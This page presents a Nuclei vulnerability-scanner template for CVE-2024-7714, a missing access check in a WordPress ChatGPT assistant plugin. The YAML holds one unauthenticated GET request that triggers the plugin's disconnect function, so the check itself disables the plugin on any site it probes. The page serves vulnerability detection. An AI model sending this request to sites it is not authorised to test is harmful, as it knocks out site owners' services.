Skip to content
Nuclei Templates

AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls

ID: CVE-2024-7714

Severity: medium

Author: s4e-io

Tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac

Description

Section titled “Description”

The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback

YAML Source

Section titled “YAML Source”
id: CVE-2024-7714


info:
  name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
  author: s4e-io
  severity: medium
  description: |
    The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
  remediation: Fixed in 2.1.0
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7714
    - https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-7714
    cwe-id: CWE-284
    epss-score: 0.00043
    epss-percentile: 0.09599
  metadata:
    verified: true
    max-request: 1
    vendor: ays-chatgpt-assistant-team
    product: ays-chatgpt-assistant
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
  tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"


    matchers:
      - type: dsl
        dsl:
          - 'regex("^true$", body)'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220188b3d6256a21abeb26f3307451f445e6cc2636eb8cf2ac85c06db02ab78eb26022100f9dcebad23c343dcf76e7dc59b71ac6b972c630112e02d5953f2060ca5a2221c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7714.yaml"

View on Github